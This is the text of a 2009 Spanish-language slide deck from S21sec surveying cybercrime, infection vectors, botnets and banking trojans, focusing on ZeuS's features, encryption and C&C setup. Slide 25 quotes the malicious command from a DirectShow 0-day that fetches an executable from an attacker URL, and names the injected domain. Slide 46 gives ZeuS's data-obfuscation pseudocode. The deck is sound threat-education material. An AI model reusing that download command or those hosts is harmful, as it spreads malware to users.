1. *[ CIBERCRIMEN: FRAUDE Y MALWARE ]
Autor: Mikel Gastesi Urroz
mgastesi@s21sec.com
Fecha: 10-07-2009
2. Confidencialidad
La información facilitada en este documento es propiedad de S21sec,
quedando terminantemente prohibida la modificación o explotación de la
totalidad o parte de los contenidos del presente documento, sin el
consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no
contestación a la correspondiente solicitud pueda ser entendida como
autorización presunta para su utilización.
Pág. 2
7. EVOLUCION
1 persona
• Ataques dirigidos
• Recursos limitados
Grupos profesionales
• Ataques indiscriminados/masivos
• Muchos recursos técnicos
8. EVOLUCIÓN
Cambio de objetivos
Inicios: Ataques al servidor
• Necesidad de pocos recursos
• Mayor conciencia de seguridad
Ahora: Ataque a los clientes
• Necesidad de manejar mucha
información
• Necesidad de una infraestructura
tecnológica
• Poca conciencia de seguridad
9. EVOLUCIÓN
1 servidor
• Búsqueda de vulnerabilidades
• Atacante trata de acceder al servidor
N clientes
• Vulnerabilidades conocidas
• Victima accede al vector de infección
• ¿Phishing? → Malware!!!
21. INFECCIÓN
Software vulnerable
• Sistema Operativo
• Navegador
• Complementos
• Flash
• PDF...
TODO programa que interactúe con
el exterior es una POSIBLE víctima.
24. INFECCIÓN
Víctima “vulnerable”
• Ejecución de ficheros adjuntos
• Doble extensión (.doc______.exe)
Confianza en la página
• Codecs
No siempre se está a salvo teniendo
todo el software actualizado
• 0-days
• Ventana de tiempo de los antivirus
25. INFECCIÓN
Microsoft DirectShow 0-day (msvidctl.dll)
• Páginas comprometidas
• Inyecta 8oy4t.8866.org/aa/go.jpg
• Muchos exploits, entre ellos el 0day
• 2000, 2003 y XP vulnerables
• Ejecuta: C:[%programfiles%]Internet
Exploreriexplore.exe "http://milllk.com/wm/svchost.exe"
• Detectado por solamente por 2 AV (VirusTotal)
• Por ahora, v0.1
http://www.securityfocus.com/bid/35558
http://www.csis.dk/en/news/news.asp?tekstID=799
http://www.microsoft.com/technet/security/advisory/97
2890.mspx
26. INFECCIÓN
La cadena es tan fuerte como el eslabón más débil
31. BOTNETS
No solo PCs
Botnets ocultas tras Bullet-proof ISP
• No responden a avisos de abuso
• Alojan paneles de control
• Alojan vectores de infección y
malware
• Fraudulento
33. TROYANOS BANCARIOS
Silenciosos
Distribución masiva
Botnet
Robar credenciales
MitB
¿Por qué no más? ¡Es gratis!
• Control de la máquina
• Proxy
• …
Programado por humanos
• Parámetros
• Idioma, user-agent...
34. TROYANOS BANCARIOS
Actores
• Sinowal
• Torpig
• Buena ocultación
• Generación de dominios mediante
algoritmo
• Arrestos
• BankPatch
• MitB
• ZeuS
• Más sencillo
• Ocultación user-mode
• ¡El rey del mambo!
35. ZEUS
Finales 2006
• Simple bot
• ~3000$
Principios 2007
• Se hace popular
• ~700$
Finales 2007
• Versiones personalizadas
Mediados 2008
• Vulnerabilidades
• Implementaciones en paralelo
2009
• Vulnerabilidades corregidas
• Soporta parcialmente IPv6...
36. ZEUS – CAMBIOS IMPORTANTES
Corrección de bugs
• Mal saneamiento de parámetros
• Escritura de ficheros
• ¡Guerra!
10-12-2008 → RC4
• Local data requests to the server
and the configuration file can be
encrypted with RC4 key depending
on your choice
38. ZEUS
Distribución
• SPAM
• Facturas
• E-cards
• Michael Jackson
• Kits de exploits
39. ZEUS - CARACTERÍSTICAS
Bot
Actualización configuración
Actualización del binario
/etc/hosts
Socks proxy
Inyección HTML
Redirección HTML
Capturas de pantalla
Capturas de teclados virtuales
Captura de credenciales
Robo certificados
KillOS
40. ZEUS - TODO
Compatibility with Windows Vista
and Windows 7
Improved WinAPI hooking
Random generation of configuration
files to avoid generic detection
Console-based builder
Version supporing 64 bit processors
Full IPv6 support
Detailed statistics on antivirus
software and firewalls installed on
the infected machines
45. ZEUS
Config file:
• Cifrado con RC4
• Update binary
• Url C&C server
• Advanced configuration
• Webfilters
• WebFakes
• WebInjects
46. ZEUS
Ficheros de datos
• Cifrado RC4 al servidor
• Cifrado.
For i = 1 to Length(Data)
If (i % 2) == 0
Data[i] -= 7 + i * 2
Else
Data[i] += 10 + i * 2
48. ZEUS - C&C
Instalación:
• Siguiente → Siguiente → Final
PHP + mysql
• O ficheros
Generador de ficheros de
configuración y binarios.
Opciones del panel de control
49. ZEUS - C&C
Instalación:
• Siguiente → Siguiente → Final
PHP + mysql
• O ficheros
Generador de ficheros de
configuración y binarios.
Opciones del panel de control